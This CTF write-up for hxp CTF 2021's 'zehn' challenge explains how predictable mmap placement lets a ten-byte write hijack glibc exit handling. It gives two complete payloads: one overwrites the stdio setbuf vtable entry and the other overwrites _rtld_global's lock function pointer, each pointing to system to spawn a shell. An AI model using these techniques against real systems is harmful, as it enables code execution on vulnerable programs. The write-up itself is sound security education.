hxp CTF 2021: zehn writeup

This task is about determinism of ASLR as implemented by the Linux kernel (in early 2022): One of the mechanisms to obtain an aslr’d piece of memory is via the mmap system call which, (un)fortunately, allocates memory at predictable relative distances from each other. The task description gave a link to a proposed patch set remedying the issue by introducing a randomize_va_space level 3 for full randomization, but so far it hasn’t been adopted.

The vulnerable program would allow to write at most 10 (zehn = ten) bytes relative to the beginning of a freshly allocated chunk at user-specified offsets:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    size_t size = 0;
    size_t idx = 0;
    unsigned int i = 0;
    unsigned char val = 0;
    unsigned char *ptr = NULL;
    size_t *doit = NULL;

    if (scanf("%zx", &size) != 1)
        goto fail;

    ptr = calloc(size, sizeof(unsigned char));

    if (!ptr)
        goto fail;

    if ((scanf("%zx", &size) != 1) || !((size < 11) && (size >= 0)))
        goto fail;

    doit = calloc(size, 2 * sizeof(size_t));

    if (!doit)
        goto fail;

    while ((i < size) && (scanf("%zx %hhx", &idx, &val) == 2)) {
        doit[2 * i] = idx;
        doit[2 * i + 1] = val;
        i++;
    }

    for (i = 0; i < size; i++) {
        ptr[doit[2 * i]] = (unsigned char)doit[2 * i + 1];
    }

    exit(0);
fail:
    exit(-1);
}

The first trick is that calloc/malloc fall back to allocating memory via mmap (instead of operating in the program break via sbrk) if the requested allocation size is larger than mp_:mmap_threshold. We can confirm this by consulting the source code of the libc version shipped with the challenge. This is malloc.c from glibc-2.33, line 2403:

/*
   sysmalloc handles malloc cases requiring more memory from the system.
   On entry, it is assumed that av->top does not have enough
   space to service request for nb bytes, thus requiring that av->top
   be extended or replaced.
 */

static void *
sysmalloc (INTERNAL_SIZE_T nb, mstate av)
{
  mchunkptr old_top;              /* incoming value of av->top */
  INTERNAL_SIZE_T old_size;       /* its size */
  char *old_end;                  /* its end address */

  long size;                      /* arg to first MORECORE or mmap call */
  char *brk;                      /* return value from MORECORE */

  long correction;                /* arg to 2nd MORECORE call */
  char *snd_brk;                  /* 2nd return val */

  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
  char *aligned_brk;              /* aligned offset into brk */

  mchunkptr p;                    /* the allocated/returned chunk */
  mchunkptr remainder;            /* remainder from allocation */
  unsigned long remainder_size;   /* its size */


  size_t pagesize = GLRO (dl_pagesize);
  bool tried_mmap = false;


  /*
     If have mmap, and the request size meets the mmap threshold, and
     the system supports mmap, and there are few enough currently
     allocated mmapped regions, try to directly map this request
     rather than expanding top.
   */

  if (av == NULL
      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
    {
      char *mm;           /* return value from mmap call*/

    try_mmap:
      /*
         Round up size to nearest page.  For mmapped chunks, the overhead
         is one SIZE_SZ unit larger than for normal chunks, because there
         is no following chunk whose prev_size field could be used.

         See the front_misalign handling below, for glibc there is no
         need for further alignments unless we have have high alignment.
       */
      if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ)
        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
      else
        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
      tried_mmap = true;

      /* Don't try if size wraps around 0 */
      if ((unsigned long) (size) > (unsigned long) (nb))
        {
          mm = (char *) (MMAP (0, size,
			       MTAG_MMAP_FLAGS | PROT_READ | PROT_WRITE, 0));
// >% snip

The value of mp_.mmap_threshold can be set at run-time via the M_MMAP_THRESHOLD value passed to the mallopt function. By default, the threshold is set to 0x20000. For example, a calloc(0x21000) will return a chunk freshly allocated by mmap at constant distance to all dynamic libraries in the address space. Hence, no ASLR leak is required to solve this challenge. Furthermore, even though the vulnerable program calls exit immediately after letting the player overwrite (at most) ten bytes, there is a lot of code dispatched during exit handling providing promising targets to reach code execution.

From here, many approaches as to what data structure to overwrite exist. As part of this writeup, we will present two possible exploitation vectors.

Approach 1: Abuse Cleanup Mechanism of stdio

During exit, glibc flushes and cleans up all data that might still reside in its internal buffers. During this operation, execution reaches the _IO_cleanup function, which calls _IO_unbuffer_all (the later having been inlined in the given glibc binary, but this is not a problem for exploitation):

/* The following is a bit tricky.  In general, we want to unbuffer the
   streams so that all output which follows is seen.  If we are not
   looking for memory leaks it does not make much sense to free the
   actual buffer because this will happen anyway once the program
   terminated.  If we do want to look for memory leaks we have to free
   the buffers.  Whether something is freed is determined by the
   function sin the libc_freeres section.  Those are called as part of
   the atexit routine, just like _IO_cleanup.  The problem is we do
   not know whether the freeres code is called first or _IO_cleanup.
   if the former is the case, we set the DEALLOC_BUFFER variable to
   true and _IO_unbuffer_all will take care of the rest.  If
   _IO_unbuffer_all is called first we add the streams to a list
   which the freeres function later can walk through.  */
static void _IO_unbuffer_all (void);

static bool dealloc_buffers;
static FILE *freeres_list;

static void
_IO_unbuffer_all (void)
{
  FILE *fp;

#ifdef _IO_MTSAFE_IO
  _IO_cleanup_region_start_noarg (flush_cleanup);
  _IO_lock_lock (list_all_lock);
#endif

  for (fp = (FILE *) _IO_list_all; fp; fp = fp->_chain)
    {
      int legacy = 0;

#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1)
      if (__glibc_unlikely (_IO_vtable_offset (fp) != 0))
	legacy = 1;
#endif

      if (! (fp->_flags & _IO_UNBUFFERED)
	  /* Iff stream is un-orientated, it wasn't used. */
	  && (legacy || fp->_mode != 0))
	{
#ifdef _IO_MTSAFE_IO
	  int cnt;
#define MAXTRIES 2
	  for (cnt = 0; cnt < MAXTRIES; ++cnt)
	    if (fp->_lock == NULL || _IO_lock_trylock (*fp->_lock) == 0)
	      break;
	    else
	      /* Give the other thread time to finish up its use of the
		 stream.  */
	      __sched_yield ();
#endif

	  if (! legacy && ! dealloc_buffers && !(fp->_flags & _IO_USER_BUF))
	    {
	      fp->_flags |= _IO_USER_BUF;

	      fp->_freeres_list = freeres_list;
	      freeres_list = fp;
	      fp->_freeres_buf = fp->_IO_buf_base;
	    }

	  _IO_SETBUF (fp, NULL, 0); /* !!! attack here !!! */

	  if (! legacy && fp->_mode > 0)
	    _IO_wsetb (fp, NULL, NULL, 0);

#ifdef _IO_MTSAFE_IO
	  if (cnt < MAXTRIES && fp->_lock != NULL)
	    _IO_lock_unlock (*fp->_lock);
#endif
	}

      /* Make sure that never again the wide char functions can be
	 used.  */
      if (! legacy)
	fp->_mode = -1;
    }

#ifdef _IO_MTSAFE_IO
  _IO_lock_unlock (list_all_lock);
  _IO_cleanup_region_end (0);
#endif
}

The function traverses _IO_list_all and calls _IO_SETBUF on each unbuffered file. Due to glibc’s internal structure, the call to _IO_SETBUF is hijackable. This is because stdio’s functionality is implemented via vtables, which happen to be lists of function pointers residing in writeable memory. Some sanitization is performed on those pointers at runtime via IO_vtable_check, but for some reason this sanitization doesn’t trigger in our case.

To understand what’s going on, we need the definitions of struct _IO_FILE, which is wrapped by struct _IO_FILE_complete, as defined in struct_FILE.h (line 46):

/* The tag name of this struct is _IO_FILE to preserve historic
   C++ mangled names for functions taking FILE* arguments.
   That name should not be used in new code.  */
struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */

  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
  char *_IO_read_base;	/* Start of putback+get area. */
  char *_IO_write_base;	/* Start of put area. */
  char *_IO_write_ptr;	/* Current put pointer. */
  char *_IO_write_end;	/* End of put area. */
  char *_IO_buf_base;	/* Start of reserve area. */
  char *_IO_buf_end;	/* End of reserve area. */

  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
  int _flags2;
  __off_t _old_offset; /* This used to be _offset but it's too small.  */

  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

struct _IO_FILE_complete
{
  struct _IO_FILE _file;
#endif
  __off64_t _offset;
  /* Wide character stream stuff.  */
  struct _IO_codecvt *_codecvt;
  struct _IO_wide_data *_wide_data;
  struct _IO_FILE *_freeres_list;
  void *_freeres_buf;
  size_t __pad5;
  int _mode;
  /* Make sure we don't get into trouble again.  */
  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};

This structure is embedded into a struct _IO_FILE_plus, meaning that there is another trailing pointer pointing to the vtable.

struct _IO_FILE_plus
{
  FILE file;
  const struct _IO_jump_t *vtable;
};

Combining all of this together means that the memory layout looks as follows:

.data:00000000001C0800                 public _IO_2_1_stdin_
.data:00000000001C0800 _IO_2_1_stdin_  dd 0FBAD2088h           ; DATA XREF: LOAD:0000000000009B40↑o
.data:00000000001C0800                                         ; .got:_IO_2_1_stdin__ptr↑o ...
.data:00000000001C0804                 dq 0                    ; _IO_read_ptr
.data:00000000001C080C                 dq 0                    ; _IO_read_end
.data:00000000001C0814                 dq 0                    ; _IO_read_base
.data:00000000001C081C                 dq 0                    ; _IO_write_base
.data:00000000001C0824                 dq 0                    ; _IO_write_ptr
.data:00000000001C082C                 dq 0                    ; _IO_write_end
.data:00000000001C0834                 dq 0                    ; _IO_buf_base
.data:00000000001C083C                 dq 0                    ; _IO_buf_end
.data:00000000001C0844                 dq 0                    ; _IO_save_base
.data:00000000001C084C                 dq 0                    ; _IO_backup_base
.data:00000000001C0854                 dq 0                    ; _IO_save_end
.data:00000000001C085C                 dq 0                    ; _markers
.data:00000000001C0864                 dq 0                    ; _chain
.data:00000000001C086C                 dd 0                    ; _fileno
.data:00000000001C0870                 dd 0                    ; _flags2
.data:00000000001C0874                 dq 0FFFFFFFF00000000h   ; _old_offset
.data:00000000001C087C                 dw 0FFFFh               ; _cur_column
.data:00000000001C087E                 db 0FFh                 ; _vtable_offset
.data:00000000001C087F                 db 0FFh                 ; _shortbuf
.data:00000000001C0880                 db    0
.data:00000000001C0881                 db    0
.data:00000000001C0882                 db    0
.data:00000000001C0883                 db    0
.data:00000000001C0884                 db    0
.data:00000000001C0885                 db    0
.data:00000000001C0886                 db    0
.data:00000000001C0887                 db    0
.data:00000000001C0888                 dq offset _IO_stdfile_0_lock ; _lock
.data:00000000001C0890                 dq 0FFFFFFFFFFFFFFFFh   ; _offset
.data:00000000001C0898                 dq 0                    ; _codecvt
.data:00000000001C08A0                 dq offset _IO_wide_data_0 ; _wide_data
.data:00000000001C08A8                 dq 0                    ; _freeres_list
.data:00000000001C08B0                 dq 0                    ; _freeres_buf
.data:00000000001C08B8                 dq 0                    ; __pad5
.data:00000000001C08C0                 dd 0                    ; _mode
.data:00000000001C08C4                 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ; _unused2
.data:00000000001C08C4                 db 0, 0
.data:00000000001C08D8                 dq offset __GI__IO_file_jumps  ; vtable

Combine the knowledge of this data structure with the ASM code of _IO_cleanup/_IO_unbuffer_all:

; %< snip >%
.text:0000000000083A53 loc_83A53:                              ; CODE XREF: _IO_cleanup+6E↑j
.text:0000000000083A53                 mov     eax, dword ptr cs:list_all_lock+4
.text:0000000000083A59                 mov     r14, cs:__GI__IO_list_all
; >% snip %<
.text:0000000000083B1C loc_83B1C:                              ; CODE XREF: _IO_cleanup+14F↑j
.text:0000000000083B1C                                         ; _IO_cleanup+2B6↓j
.text:0000000000083B1C                 mov     rax, [r14+0D8h]
; >% snip %<
.text:0000000000083B32 loc_83B32:                              ; CODE XREF: _IO_cleanup+317↓j
.text:0000000000083B32                 xor     edx, edx
.text:0000000000083B34                 xor     esi, esi
.text:0000000000083B36                 mov     rdi, r14
.text:0000000000083B39                 call    qword ptr [rax+58h]

First r14 gets initialized to point to the beginning of the file structure(s) at 0x83a59. Then, the vtable member at structure offset 0xd8 is loaded into rax. Within the _IO_file_jumps table, the function pointer at offset 0x58 is, unsurprisingly, function __GI__IO_file_setbuf:

__libc_IO_vtables:00000000001C2300 __GI__IO_file_jumps dq 0                ; DATA XREF: LOAD:000000000000E358↑o
__libc_IO_vtables:00000000001C2300                                         ; check_stdfiles_vtables+B↑o ...
__libc_IO_vtables:00000000001C2300                                         ; Alternative name is '_IO_file_jumps'
__libc_IO_vtables:00000000001C2308                 dq 0
__libc_IO_vtables:00000000001C2310                 dq offset __GI__IO_file_finish
__libc_IO_vtables:00000000001C2318                 dq offset __GI__IO_file_overflow
__libc_IO_vtables:00000000001C2320                 dq offset __GI__IO_file_underflow
__libc_IO_vtables:00000000001C2328                 dq offset __GI__IO_default_uflow
__libc_IO_vtables:00000000001C2330                 dq offset __GI__IO_default_pbackfail
__libc_IO_vtables:00000000001C2338                 dq offset __GI__IO_file_xsputn
__libc_IO_vtables:00000000001C2340                 dq offset __GI__IO_file_xsgetn
__libc_IO_vtables:00000000001C2348                 dq offset __GI__IO_file_seekoff
__libc_IO_vtables:00000000001C2350                 dq offset _IO_default_seekpos
__libc_IO_vtables:00000000001C2358                 dq offset __GI__IO_file_setbuf   ; <- attackable pointer
__libc_IO_vtables:00000000001C2360                 dq offset __GI__IO_file_sync
__libc_IO_vtables:00000000001C2368                 dq offset __GI__IO_file_doallocate
__libc_IO_vtables:00000000001C2370                 dq offset __GI__IO_file_read
__libc_IO_vtables:00000000001C2378                 dq offset _IO_new_file_write
__libc_IO_vtables:00000000001C2380                 dq offset __GI__IO_file_seek
__libc_IO_vtables:00000000001C2388                 dq offset __GI__IO_file_close
__libc_IO_vtables:00000000001C2390                 dq offset __GI__IO_file_stat
__libc_IO_vtables:00000000001C2398                 dq offset _IO_default_showmanyc
__libc_IO_vtables:00000000001C23A0                 dq offset _IO_default_imbue

From here, exploitation es straightforward: Perform a 3-byte partial overwrite on the __GI__IO_file_setbuf pointer stored at libc_base+0x1C2358 to point to system (requiring a 12-bit ASLR bruteforce), and write the string ;sh to address libc_base+0x1C0804 to set the first argument for system. This is because the dispatching call at libc_base+0x83B39 passes a pointer to the file structure itself to the callee. Since the file structure starts with the file magic 0x0FBAD2088 including several status bits, and we prefer not to mess with the control flow’s logic, we simply overwrite the 3 bytes immediately after the file magic with ;sh to make sure we actually reach the vulnerable call. The ; will terminate the meaningless file-magic garbage command passed to system, and sh will then give us code execution.

To trigger code execution, pass (for example) the following input to the vulnerable program, remembering the 12-bit ASLR bruteforce:

0x30000 0x6       allocation size and number of bytes to write
0x1f5348 0xe0     partially overwrite _IO_file_jumps._IO_file_setbuf with pointer to system (XXXde0) 
0x1f5349 0x7d
0x1f534a 0x13
0x1f37f4 0x3b     overwrite _IO_2_1_stdin_._IO_read_ptr with ";sh"
0x1f37f5 0x73
0x1f37f6 0x68

Approach 2: Abuse Locking Mechanism of the Loader

The _dl_fini function is responsible for destructor handling of dynamically loaded objects, gets (almost) always called on program termination and dispatches globally writeable function pointers that can be overwritten to gain code execution.

The interesting part is in line 29 to 54 in dl-fini.c:

void
_dl_fini (void)
{
  /* Lots of fun ahead.  We have to call the destructors for all still
     loaded objects, in all namespaces.  The problem is that the ELF
     specification now demands that dependencies between the modules
     are taken into account.  I.e., the destructor for a module is
     called before the ones for any of its dependencies.

     To make things more complicated, we cannot simply use the reverse
     order of the constructors.  Since the user might have loaded objects
     using `dlopen' there are possibly several other modules with its
     dependencies to be taken into account.  Therefore we have to start
     determining the order of the modules once again from the beginning.  */

  /* We run the destructors of the main namespaces last.  As for the
     other namespaces, we pick run the destructors in them in reverse
     order of the namespace ID.  */
#ifdef SHARED
  int do_audit = 0;
 again:
#endif
  for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
    {
      /* Protect against concurrent loads and unloads.  */
      __rtld_lock_lock_recursive (GL(dl_load_lock));


Line 54 expands to

  GL(dl_rtld_lock_recursive) (&(GL(dl_load_lock)).mutex)

expanding to

    _rtld_global.dl_rtld_lock_recursive(&_rtld_global.dl_load_lock.mutex)

.

Since both are entries of the writeable global variable _rtld_global, one can overwrite both, the function pointer dl_rtld_lock_recursive, and the dl_load_lock mutex to gain an easy system("sh") primitive. The dl_rtld_lock_recursive pointer points to rtld_lock_default_lock_recursive in a single-threaded application, and to pthread_mutex_lock if the victim program was linked against libpthread. Both are a fair distance away from system, hence a 3-byte override is required to reach code execution. Of the overriding 3*8=24 bits, the lowest 12 bits are fixed (0xde0) leaving the remaining 12 ASLR’d bits for brute-force.

For the ld binary handed out with the challenge, this means that one needs to write write "sh" to ld_base+0x30988, and a 24-bit value ending on 0xde0 (last three nibbles of system@glibc) to ld_base+0x30f90.

To trigger code execution, pass (for example) the following input to the vulnerable program, remembering the 12-bit ASLR bruteforce:

0x1000000 0x5       allocation size and number of bytes to write
0x1206978 0x73      overwrite _rtld_global.dl_load_lock.mutex with "sh"
0x1206979 0x68
0x1206f80 0xe0      partially overwrite _rtld_global.dl_rtld_lock_recursive with pointer to system (XXXde0) 
0x1206f81 0xbd
0x1206f82 0x4b